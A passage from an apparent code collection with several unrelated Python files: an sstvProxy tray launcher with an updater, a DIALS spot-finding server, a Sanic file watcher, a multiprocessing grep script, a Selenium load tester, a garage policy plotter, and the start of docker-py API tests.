logAction = self.menu.addAction('Open Logs')
QtCore.QObject.connect(logAction, QtCore.SIGNAL('triggered()'), self.tray_logs)
cacheAction = self.menu.addAction('Clear Cache')
QtCore.QObject.connect(cacheAction, QtCore.SIGNAL('triggered()'), self.tray_cache)
exitAction = self.menu.addAction('Exit')
QtCore.QObject.connect(exitAction, QtCore.SIGNAL('triggered()'), self.on_exit)
def initVariables(self):
self.type = ""
self.version = float("0.0")
self.latestVersion = float("0.0")
# Branch Master = True
self.branch = True
self.yap = None
self.LISTEN_IP = '127.0.0.1'
self.LISTEN_PORT = 6969
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
self.start = False
self.validIcon = QtGui.QIcon("logo_tray.ico")
self.updateIcon = QtGui.QIcon("logo_tray-update.ico")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "version" in config:
self.version = config["version"]
if "type" in config:
self.type = config["type"]
if "branch" in config:
self.branch = config["branch"] == True
self.assign_latestFile()
self.check_install()
self.start = True
except:
urllib.request.urlretrieve('https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico'))
urllib.request.urlretrieve(
'https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray-update.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray-update.ico'))
self.detect_install()
self.assign_latestFile()
self.version = float(self.version)
logger.debug("Settings complete")
return
def closeEvent(self, event):
if self.okayToClose():
#user asked for exit
self.trayIcon.hide()
event.accept()
else:
#"minimize"
self.hide()
self.trayIcon.show() #thanks @mojo
event.ignore()
def __icon_activated(self, reason):
if reason in (QtGui.QSystemTrayIcon.Trigger, QtGui.QSystemTrayIcon.DoubleClick):
logger.info("double clicked")
self.show()
def on_exit(self):
if self.yap: self.yap.terminate()
self.exit()
def exit(self):
QtCore.QCoreApplication.exit()
def showTerminal(self):
import time
import select
if platform.system() == 'Linux':
#subprocess.Popen(args, stdout=subprocess.PIPE)
subprocess.Popen(["tail", "-F", "nohup.out"], stdout=subprocess.PIPE)
#f = subprocess.Popen(['tail','-F','nohup.out')],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#p = select.poll()
#p.register(f.stdout)
#while True:
#if p.poll(1):
#print (f.stdout.readline())
#time.sleep(1)
elif platform.system() == 'Windows':
a=1
elif platform.system() == 'Darwin':
a=1
def gather_yap(self):
if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')):
logger.debug("No config file found.")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "ip" in config and "port" in config:
self.LISTEN_IP = config["ip"]
self.LISTEN_PORT = config["port"]
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
logger.debug("Using config file.")
except:
pass
def tray_update(self):
if self.version < self.latestVersion:
# todo make update link
self.shutdown(update=True, restart=True)
self.set_icon()
else:
icon = os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico')
hover_text = 'YAP' + ' - No Update Available'
self.set_icon()
def set_icon(self):
logger.info("set icon")
if self.version < self.latestVersion:
icon = os.path.abspath('logo_tray-update.ico')
hover_text = 'YAP' + ' - Update Available!'
self.setIcon(self.updateIcon)
else:
icon = os.path.abspath('logo_tray.ico')
hover_text = 'YAP'
self.setIcon(self.validIcon)
logger.info("icon 2")
return
def detect_install(self):
logger.info("Detect install")
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
logger.info("Detect python")
self.type = ""
return
elif platform.system() == 'Linux':
self.type = "Linux/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
logger.info("Detect linux exe")
return
elif platform.system() == 'Windows':
self.type = "Windows/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
logger.info("Detect win exe")
return
elif platform.system() == 'Darwin':
self.type = "Macintosh/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
logger.info("Detect mac exe")
return
logger.info('installing')
self.assign_latestFile()
self.shutdown(update=True, install=True)
def check_install(self):
logger.debug("Check install")
if self.type == "" and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
return
elif self.type == "Linux/" and platform.system() == 'Linux' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
return
elif self.type == "Windows/" and platform.system() == 'Windows'and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
return
elif self.type == "Macintosh/" and platform.system() == 'Darwin' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
return
logger.info('Installing YAP %s' % self.type)
self.assign_latestFile()
self.shutdown(update=True)
def assign_latestFile(self):
if self.type == "": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/sstvProxy.py"
elif self.type == "Linux/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Linux/sstvProxy"
elif self.type == "Windows/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Windows/sstvproxy.exe"
elif self.type == "Macintosh/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Macintosh/sstvproxy"
self.url = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/%sversion.txt" % self.type
try:
self.latestVersion = float(requests.get(self.url).json()['Version'])
except:
self.latestVersion = float(0.0)
logger.info("Latest version check failed, check internet.")
logger.info(self.url)
def tray_open(self):
self.launch_browser()
def tray_check_update(self):
try:
latest_ver = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
except:
latest_ver = float(0.0)
logger.info("Latest version check failed, check internet.")
if self.version < latest_ver:
logger.info("Update Available. You are on v%s with v%s available." % (self.version, latest_ver))
else:
logger.info("Proxy is up to date!")
def save_data(self):
logger.info("Saving data")
config = {'version':self.version,'type':self.type,'branch':self.branch}
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json'), 'w') as fp:
json.dump(config, fp)
def tray_start(self):
if self.type == "":
import sstvProxy
self.yap = multiprocessing.Process(target=sstvProxy.main)
self.yap.start()
elif self.type == "Linux/": subprocess.Popen(os.path.abspath("sstvProxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#elif self.type == "Linux/": os.spawnl(sys.executable, os.path.abspath("sstvProxy"))
elif self.type == "Windows/": subprocess.Popen([".\sstvproxy.exe", "-d"], cwd=os.getcwd())
elif self.type == "Macintosh/": subprocess.Popen(os.path.abspath("sstvproxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE) #os.execv(sys.executable, ["./sstvproxy", "-d"])
self.start = True
self.createMenu(True)
def tray_restart(self):
self.shutdown(restart=True)
def tray_quit(self):
self.shutdown()
def tray_cache(self):
shutil.rmtree(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), ignore_errors=True)
def tray_logs(self):
try:
import webbrowser
webbrowser.open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'))
except Exception as e:
logger.error(u"Could not open logs: %s" % e)
def tray_branch(self):
self.branch = not self.branch
self.shutdown(update=True, restart=True)
def launch_browser(self):
try:
import webbrowser
self.gather_yap()
webbrowser.open('%s%s' % (self.SERVER_HOST,'/sstv/index.html'))
except Exception as e:
logger.error(u"Could not launch browser: %s" % e)
def shutdown(self, restart=False, update=False, install=False):
logger.info(u"Stopping YAP web server...")
if self.type == 'Windows/':
os.system("taskkill /F /im sstvProxy.exe")
elif self.type == 'Linux/':
import psutil
PROCNAME = "sstvProxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.type == 'Macintosh/':
import psutil
PROCNAME = "sstvproxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.yap:
self.yap.terminate()
self.yap = None
if update:
logger.info(u"YAP is updating...")
url = self.latestfile.format(branch='master' if self.branch else 'dev')
try:
newfilename = ntpath.basename(url)
logger.debug("downloading %s to %s" % (url,os.path.join(os.path.dirname(sys.argv[0]), newfilename)))
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
except Exception as e:
os.system("taskkill /F /im sstvProxy.exe")
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
logger.info("Update forced")
logger.debug("Gathering version")
self.version = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
self.save_data()
if install and platform.system() == 'Linux':
os.chmod(os.path.join(os.path.dirname(sys.argv[0]), ntpath.basename(url)), 0o777)
if restart:
os.system('cls' if os.name == 'nt' else 'clear')
logger.info(u"YAP is restarting...")
self.tray_start()
def main():
app = QtGui.QApplication(sys.argv)
w = QtGui.QWidget()
trayIcon = SystemTrayIcon(QtGui.QIcon('logo_tray.ico'), w)
signal.signal(signal.SIGINT, signal.SIG_DFL)
trayIcon.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
find_spots_server.py
|
import http.server as server_base
import json
import logging
import multiprocessing
import sys
import time
import urllib.parse
import libtbx.phil
from cctbx import uctbx
from dxtbx.model.experiment_list import ExperimentListFactory
from libtbx.introspection import number_of_processors
from dials.algorithms.indexing import indexer
from dials.algorithms.integration.integrator import create_integrator
from dials.algorithms.profile_model.factory import ProfileModelFactory
from dials.algorithms.spot_finding import per_image_analysis
from dials.array_family import flex
from dials.command_line.find_spots import phil_scope as find_spots_phil_scope
from dials.command_line.index import phil_scope as index_phil_scope
from dials.command_line.integrate import phil_scope as integrate_phil_scope
from dials.util import Sorry, show_mail_handle_errors
from dials.util.options import OptionParser
logger = logging.getLogger("dials.command_line.find_spots_server")
help_message = """\
A client/server version of dials.find_spots with additional analysis including
estimation of resolution limits. Intended for quick feedback of image quality
during grid scans and data collections.
On the server machine::
dials.find_spots_server [nproc=8] [port=1234]
On the client machine::
dials.find_spots_client [host=hostname] [port=1234] [nproc=8] /path/to/image.cbf
The client will return a short xml string indicating the number of spots found
and several estimates of the resolution limit.
e.g.::
<response>

<spot_count>352</spot_count>
<spot_count_no_ice>263</spot_count_no_ice>
<d_min>1.46</d_min>
<d_min_method_1>1.92</d_min_method_1>
<d_min_method_2>1.68</d_min_method_2>
<total_intensity>56215</total_intensity>
</response>
* ``spot_count`` is the total number of spots found in given image
* ``spot_count_no_ice`` is the number of spots found excluding those at resolutions
where ice rings may be found
* ``d_min_method_1`` is equivalent to distl's resolution estimate method 1
* ``d_min_method_2`` is equivalent to distl's resolution estimate method 2
* ``total_intensity`` is the total intensity of all strong spots excluding those
at resolutions where ice rings may be found
Any valid ``dials.find_spots`` parameter may be passed to
``dials.find_spots_client``, e.g.::
dials.find_spots_client /path/to/image.cbf min_spot_size=2 d_min=2
To stop the server::
dials.find_spots_client stop [host=hostname] [port=1234]
"""
stop = False
def _filter_by_resolution(experiments, reflections, d_min=None, d_max=None):
reflections.centroid_px_to_mm(experiments)
reflections.map_centroids_to_reciprocal_space(experiments)
d_star_sq = flex.pow2(reflections["rlp"].norms())
reflections["d"] = uctbx.d_star_sq_as_d(d_star_sq)
# Filter based on resolution
if d_min is not None:
selection = reflections["d"] >= d_min
reflections = reflections.select(selection)
logger.debug(f"Selected {len(reflections)} reflections with d >= {d_min:f}")
# Filter based on resolution
if d_max is not None:
selection = reflections["d"] <= d_max
reflections = reflections.select(selection)
logger.debug(f"Selected {len(reflections)} reflections with d <= {d_max:f}")
return reflections
def work(filename, cl=None):
if cl is None:
cl = []
phil_scope = libtbx.phil.parse(
"""\
ice_rings {
filter = True
.type = bool
width = 0.004
.type = float(value_min=0.0)
}
index = False
.type = bool
integrate = False
.type = bool
indexing_min_spots = 10
.type = int(value_min=1)
"""
)
interp = phil_scope.command_line_argument_interpreter()
params, unhandled = interp.process_and_fetch(
cl, custom_processor="collect_remaining"
)
filter_ice = params.extract().ice_rings.filter
ice_rings_width = params.extract().ice_rings.width
index = params.extract().index
integrate = params.extract().integrate
indexing_min_spots = params.extract().indexing_min_spots
interp = find_spots_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.info("The following spotfinding parameters have been modified:")
logger.info(find_spots_phil_scope.fetch_diff(source=phil_scope).as_str())
params = phil_scope.extract()
# no need to write the hot mask in the server/client
params.spotfinder.write_hot_mask = False
experiments = ExperimentListFactory.from_filenames([filename])
if params.spotfinder.scan_range and len(experiments) > 1:
# This means we've imported a sequence of still image: select
# only the experiment, i.e. image, we're interested in
((start, end),) = params.spotfinder.scan_range
experiments = experiments[start - 1 : end]
# Avoid overhead of calculating per-pixel resolution masks in spotfinding
# and instead perform post-filtering of spot centroids by resolution
d_min = params.spotfinder.filter.d_min
d_max = params.spotfinder.filter.d_max
params.spotfinder.filter.d_min = None
params.spotfinder.filter.d_max = None
t0 = time.perf_counter()
reflections = flex.reflection_table.from_observations(experiments, params)
if d_min or d_max:
reflections = _filter_by_resolution(
experiments, reflections, d_min=d_min, d_max=d_max
)
t1 = time.perf_counter()
logger.info("Spotfinding took %.2f seconds", t1 - t0)
imageset = experiments.imagesets()[0]
reflections.centroid_px_to_mm(experiments)
reflections.map_centroids_to_reciprocal_space(experiments)
stats = per_image_analysis.stats_for_reflection_table(
reflections, filter_ice=filter_ice, ice_rings_width=ice_rings_width
)._asdict()
t2 = time.perf_counter()
logger.info("Resolution analysis took %.2f seconds", t2 - t1)
if index and stats["n_spots_no_ice"] > indexing_min_spots:
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
interp = index_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.info("The following indexing parameters have been modified:")
index_phil_scope.fetch_diff(source=phil_scope).show()
params = phil_scope.extract()
if (
imageset.get_goniometer() is not None
and imageset.get_sequence() is not None
and imageset.get_sequence().is_still()
):
imageset.set_goniometer(None)
imageset.set_sequence(None)
try:
idxr = indexer.Indexer.from_parameters(
reflections, experiments, params=params
)
indexing_results = []
idxr.index()
indexed_sel = idxr.refined_reflections.get_flags(
idxr.refined_reflections.flags.indexed
)
indexed_sel &= ~(
idxr.refined_reflections.get_flags(
idxr.refined_reflections.flags.centroid_outlier
)
)
for i_expt, expt in enumerate(idxr.refined_experiments):
sel = idxr.refined_reflections["id"] == i_expt
sel &= indexed_sel
indexing_results.append(
{
"crystal": expt.crystal.to_dict(),
"n_indexed": sel.count(True),
"fraction_indexed": sel.count(True) / sel.size(),
}
)
stats["lattices"] = indexing_results
stats["n_indexed"] = indexed_sel.count(True)
stats["fraction_indexed"] = indexed_sel.count(True) / len(reflections)
except Exception as e:
logger.error(e)
stats["error"] = str(e)
finally:
t3 = time.perf_counter()
logger.info("Indexing took %.2f seconds", t3 - t2)
if integrate and "lattices" in stats:
interp = integrate_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.error("The following integration parameters have been modified:")
integrate_phil_scope.fetch_diff(source=phil_scope).show()
params = phil_scope.extract()
try:
params.profile.gaussian_rs.min_spots = 0
experiments = idxr.refined_experiments
reference = idxr.refined_reflections
predicted = flex.reflection_table.from_predictions_multi(
experiments,
dmin=params.prediction.d_min,
dmax=params.prediction.d_max,
margin=params.prediction.margin,
force_static=params.prediction.force_static,
)
matched, reference, unmatched = predicted.match_with_reference(
reference
)
assert len(matched) == len(predicted)
assert matched.count(True) <= len(reference)
if matched.count(True) == 0:
raise Sorry(
"""
Invalid input for reference reflections.
Zero reference spots were matched to predictions
"""
)
elif matched.count(True) != len(reference):
logger.info("")
logger.info("*" * 80)
logger.info(
"Warning: %d reference spots were not matched to predictions",
len(reference) - matched.count(True),
)
logger.info("*" * 80)
logger.info("")
# Compute the profile model
experiments = ProfileModelFactory.create(params, experiments, reference)
# Compute the bounding box
predicted.compute_bbox(experiments)
# Create the integrator
integrator = create_integrator(params, experiments, predicted)
# Integrate the reflections
reflections = integrator.integrate()
# print len(reflections)
stats["integrated_intensity"] = flex.sum(
reflections["intensity.sum.value"]
)
except Exception as e:
logger.error(e)
stats["error"] = str(e)
finally:
t4 = time.perf_counter()
logger.info("Integration took %.2f seconds", t4 - t3)
return stats
class handler(server_base.BaseHTTPRequestHandler):
def do_GET(self):
"""Respond to a GET request."""
if self.path == "/Ctrl-C":
self.send_response(200)
self.end_headers()
global stop
stop = True
return
filename = self.path.split(";")[0]
params = self.path.split(";")[1:]
# If we're passing a url through, then unquote and ignore leading /
if "%3A//" in filename:
filename = urllib.parse.unquote(filename[1:])
d = {"image": filename}
try:
stats = work(filename, params)
d.update(stats)
response = 200
except Exception as e:
d["error"] = str(e)
response = 500
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
response = json.dumps(d).encode()
self.wfile.write(response)
def serve(httpd):
try:
while not stop:
httpd.handle_request()
except KeyboardInterrupt:
pass
phil_scope = libtbx.phil.parse(
"""\
nproc = Auto
.type = int(value_min=1)
port = 1701
.type = int(value_min=1)
"""
)
def main(nproc, port):
server_class = server_base.HTTPServer
httpd = server_class(("", port), handler)
print(time.asctime(), "Serving %d processes on port %d" % (nproc, port))
for j in range(nproc - 1):
proc = multiprocessing.Process(target=serve, args=(httpd,))
proc.daemon = True
proc.start()
serve(httpd)
httpd.server_close()
print(time.asctime(), "done")
@show_mail_handle_errors()
def run(args=None):
usage = "dials.find_spots_server [options]"
# Python 3.8 on macOS... needs fork
if sys.hexversion >= 0x3080000 and sys.platform == "darwin":
multiprocessing.set_start_method("fork")
parser = OptionParser(usage=usage, phil=phil_scope, epilog=help_message)
params, options = parser.parse_args(args, show_diff_phil=True)
if params.nproc is libtbx.Auto:
params.nproc = number_of_processors(return_value_if_unknown=-1)
main(params.nproc, params.port)
if __name__ == "__main__":
run()
|
watch.py
|
import asyncio
import os
import signal
import sys
from multiprocessing import Process
from aiohttp import ClientSession
from watchgod import awatch
from .exceptions import SanicDevException
from .log import rs_dft_logger as logger
from .config import Config
from .serve import serve_main_app
class WatchTask:
def __init__(self, path: str, loop: asyncio.AbstractEventLoop):
self._loop = loop
self._app = None
self._task = None
assert path
self.stopper = asyncio.Event(loop=self._loop)
self._awatch = awatch(path, stop_event=self.stopper)
async def start(self, app):
self._app = app
self._task = self._loop.create_task(self._run())
async def _run(self):
raise NotImplementedError()
async def close(self, *args):
if self._task:
self.stopper.set()
async with self._awatch.lock:
if self._task.done():
self._task.result()
self._task.cancel()
class AppTask(WatchTask):
template_files = '.html', '.jinja', '.jinja2'
def __init__(self, config: Config, loop: asyncio.AbstractEventLoop):
self._config = config
self._reloads = 0
self._session = None
self._runner = None
super().__init__(self._config.watch_path, loop)
async def _run(self, live_checks=20):
self._session = ClientSession()
try:
self._start_dev_server()
async for changes in self._awatch:
self._reloads += 1
if any(f.endswith('.py') for _, f in changes):
logger.debug('%d changes, restarting server', len(changes))
self._stop_dev_server()
self._start_dev_server()
except Exception as exc:
logger.exception(exc)
await self._session.close()
raise SanicDevException('error running dev server')
def _start_dev_server(self):
act = 'Start' if self._reloads == 0 else 'Restart'
logger.info('%sing dev server at http://%s:%s ●', act, self._config.host, self._config.main_port)
try:
tty_path = os.ttyname(sys.stdin.fileno())
except OSError: # pragma: no branch
# fileno() always fails with pytest
tty_path = '/dev/tty'
except AttributeError:
# on windows, without a windows machine I've no idea what else to do here
tty_path = None
self._process = Process(target=serve_main_app, args=(self._config, tty_path))
self._process.start()
def _stop_dev_server(self):
if self._process.is_alive():
logger.debug('stopping server process...')
os.kill(self._process.pid, signal.SIGINT)
self._process.join(5)
if self._process.exitcode is None:
logger.warning('process has not terminated, sending SIGKILL')
os.kill(self._process.pid, signal.SIGKILL)
self._process.join(1)
else:
logger.debug('process stopped')
else:
logger.warning('server process already dead, exit code: %s', self._process.exitcode)
async def close(self, *args):
self.stopper.set()
self._stop_dev_server()
await asyncio.gather(super().close(), self._session.close())
|
manual_pool.py
|
#! /usr/local/bin/python
from sys import argv
from multiprocessing import Process, Manager
import time
import itertools
import re
def do_work(in_queue, out_list):
def any_word(patterns, data):
return [p.search(data) for p in patterns]
while True:
item = in_queue.get()
# print item
line_no, line, patterns = item
print line_no, line, patterns
# exit signal
if line == [None]:
return
ans = any_word(patterns, line)
print ans
if not any(any_word(patterns, line)):
return
result = (line_no, line)
out_list.append(result)
if __name__ == "__main__":
NUM_WORKERS = 4
filename = argv[1]
words = argv[2:]
print filename, words
patterns = [re.compile(x) for x in words]
manager = Manager()
results = manager.list()
work = manager.Queue(NUM_WORKERS)
# start workers
print 'start workers'
pool = []
for i in xrange(NUM_WORKERS):
p = Process(target=do_work, args=(work, results))
p.start()
pool.append(p)
# produce data
print 'produce data'
with open(filename) as f:
iters = itertools.chain(f, (None,)*NUM_WORKERS)
for lineno, line in enumerate(iters):
work.put((lineno, line, patterns))
print 'join'
for p in pool:
p.join()
# get the results
# example: [(1, "foo"), (10, "bar"), (0, "start")]
print results
|
pysel.py
|
import json
import time
from selenium import webdriver
import tkinter as tk
import threading
class Output():
def __init__(self):
self.outfile = open("log.log","a")
def write(self, what):
self.outfile.write(what)
class Operations():
def run(self):
for count in range(int(app.agents.get())):
t = threading.Thread(target=self.browse)
t.start()
def browse(self):
browser = webdriver.Chrome()
options = webdriver.ChromeOptions()
options.add_argument('headless')
for step in range(int(app.run.get())):
for address in app.address.get().split(";"):
browser.get(address)
time.sleep(int(app.delay.get()))
for element in app.elements.get().split(";"):
browser.find_element_by_css_selector(element).click()
output.write(json.dumps((address, step, element, time.time())))
time.sleep(int(app.delay.get()))
browser.close()
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.grid()
self.create_widgets()
def create_widgets(self):
self.address_label = tk.Label(self)
self.address_label["text"] = "Addresses: "
self.address_label.grid(row=1, column=0, sticky='', pady=5, padx=5)
self.address_value = tk.StringVar()
self.address_value.set("https://www.youtube.com/watch?v=mMNZi2rXDEo;https://www.youtube.com/watch?v=mMNZi2rXDEo")
self.address = tk.Entry(self, textvariable=self.address_value, width=70)
self.address.grid(row=1, column=1, sticky='W', padx=5)
self.run_label = tk.Label(self)
self.run_label["text"] = "Runs: "
self.run_label.grid(row=2, column=0, sticky='', padx=5)
self.run_value = tk.StringVar()
self.run_value.set("250")
self.run = tk.Entry(self, textvariable=self.run_value, width=10)
self.run.grid(row=2, column=1, sticky='W', pady=5, padx=5)
self.delay_label = tk.Label(self)
self.delay_label["text"] = "Delays: "
self.delay_label.grid(row=3, column=0, sticky='', padx=5)
self.delay_value = tk.StringVar()
self.delay_value.set("2")
self.delay = tk.Entry(self, textvariable=self.delay_value, width=10)
self.delay.grid(row=3, column=1, sticky='W', pady=5, padx=5)
self.agents_label = tk.Label(self)
self.agents_label["text"] = "Agents: "
self.agents_label.grid(row=4, column=0, sticky='', padx=5)
self.agents_value = tk.StringVar()
self.agents_value.set("1")
self.agents = tk.Entry(self, textvariable=self.agents_value, width=10)
self.agents.grid(row=4, column=1, sticky='W', pady=5, padx=5)
self.elements_label = tk.Label(self)
self.elements_label["text"] = "Elements: "
self.elements_label.grid(row=5, column=0, sticky='', padx=5)
self.elements_value = tk.StringVar()
self.elements_value.set(".ytp-progress-bar;.ytp-progress-bar")
self.elements = tk.Entry(self, textvariable=self.elements_value, width=70)
self.elements.grid(row=5, column=1, sticky='W', pady=5, padx=5)
self.send = tk.Button(self, text="Run", fg="green", command=operations.run)
self.send.grid(row=6, column=1, sticky='WE', padx=5)
self.quit = tk.Button(self, text="Quit", fg="red", command=self.master.destroy)
self.quit.grid(row=7, column=1, sticky='WE', padx=5, pady=(5))
if __name__ == "__main__":
root = tk.Tk()
root.wm_title("PySel Loadtester")
operations = Operations()
output = Output()
app = Application(master=root)
app.mainloop()
|
plotter.py
|
"""Renders rollouts of the policy as it trains."""
import atexit
from collections import namedtuple
from enum import Enum
import platform
from queue import Queue
from threading import Thread
import numpy as np
import tensorflow as tf
from garage.sampler.utils import rollout as default_rollout
__all__ = ['Plotter']
class Op(Enum):
"""Message types."""
STOP = 0
UPDATE = 1
DEMO = 2
Message = namedtuple('Message', ['op', 'args', 'kwargs'])
class Plotter:
"""Renders rollouts of the policy as it trains.
Usually, this class is used by sending plot=True to LocalRunner.train().
Args:
env (gym.Env): The environment to perform rollouts in. This will be
used without copying in the current process but in a separate thread,
so it should be given a unique copy (in particular, do not pass the
environment here, then try to pickle it, or you will occasionally get
crashes).
policy (garage.tf.Policy): The policy to do the rollouts with.
sess (tf.Session): The TensorFlow session to use.
graph (tf.Graph): The TensorFlow graph to use.
rollout (callable): The rollout function to call.
"""
# List containing all plotters instantiated in the process
__plotters = []
def __init__(self,
env,
policy,
sess=None,
graph=None,
rollout=default_rollout):
Plotter.__plotters.append(self)
self._env = env
self.sess = tf.compat.v1.Session() if sess is None else sess
self.graph = tf.compat.v1.get_default_graph(
) if graph is None else graph
with self.sess.as_default(), self.graph.as_default():
self._policy = policy.clone('plotter_policy')
self.rollout = rollout
self.worker_thread = Thread(target=self._start_worker, daemon=True)
self.queue = Queue()
# Needed in order to draw glfw window on the main thread
if 'Darwin' in platform.platform():
self.rollout(self._env,
self._policy,
max_path_length=np.inf,
animated=True,
speedup=5)
def _start_worker(self):
max_length = None
initial_rollout = True
try:
with self.sess.as_default(), self.sess.graph.as_default():
# Each iteration will process ALL messages currently in the
# queue
while True:
msgs = {}
# If true, block and yield processor
if initial_rollout:
msg = self.queue.get()
msgs[msg.op] = msg
# Only fetch the last message of each type
while not self.queue.empty():
msg = self.queue.get()
msgs[msg.op] = msg
else:
# Only fetch the last message of each type
while not self.queue.empty():
msg = self.queue.get_nowait()
msgs[msg.op] = msg
if Op.STOP in msgs:
self.queue.task_done()
break
if Op.UPDATE in msgs:
self._env, self._policy = msgs[Op.UPDATE].args
self.queue.task_done()
if Op.DEMO in msgs:
param_values, max_length = msgs[Op.DEMO].args
self._policy.set_param_values(param_values)
initial_rollout = False
self.rollout(self._env,
self._policy,
max_path_length=max_length,
animated=True,
speedup=5)
self.queue.task_done()
else:
if max_length:
self.rollout(self._env,
self._policy,
max_path_length=max_length,
animated=True,
speedup=5)
except KeyboardInterrupt:
pass
def close(self):
"""Stop the Plotter's worker thread."""
if self.worker_thread.is_alive():
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
self.queue.put(Message(op=Op.STOP, args=None, kwargs=None))
self.queue.join()
self.worker_thread.join()
@staticmethod
def get_plotters():
"""Return all garage.tf.Plotter's.
Returns:
list[garage.tf.Plotter]: All the garage.tf.Plotter's
"""
return Plotter.__plotters
def start(self):
"""Start the Plotter's worker thread."""
if not self.worker_thread.is_alive():
tf.compat.v1.get_variable_scope().reuse_variables()
self.worker_thread.start()
self.queue.put(
Message(op=Op.UPDATE,
args=(self._env, self._policy),
kwargs=None))
atexit.register(self.close)
def update_plot(self, policy, max_length=np.inf):
"""Update the policy being plotted.
Args:
policy (garage.tf.Policy): The policy to rollout.
max_length (int or float): The maximum length to allow a rollout to
be. Defaults to infinity.
"""
if self.worker_thread.is_alive():
self.queue.put(
Message(op=Op.DEMO,
args=(policy.get_param_values(), max_length),
kwargs=None))
|
api_test.py
|
import datetime
import json
import os
import re
import shutil
import socket
import sys
import tempfile
import threading
import time
import io
import docker
import requests
from requests.packages import urllib3
import six
from .. import base
from . import fake_api
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None, raw=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
res.raw = raw
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
def fake_read_from_socket(self, response, stream):
return six.binary_type()
url_base = '{0}/'.format(fake_api.prefix)
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class DockerClientTest(base.Cleanup, base.BaseTestCase):
def setUp(self):
self.patcher = mock.patch.multiple(
'docker.Client', get=fake_get, post=fake_post, put=fake_put,
delete=fake_delete,
_read_from_socket=fake_read_from_socket
)
self.patcher.start()
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
self.patcher.stop()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
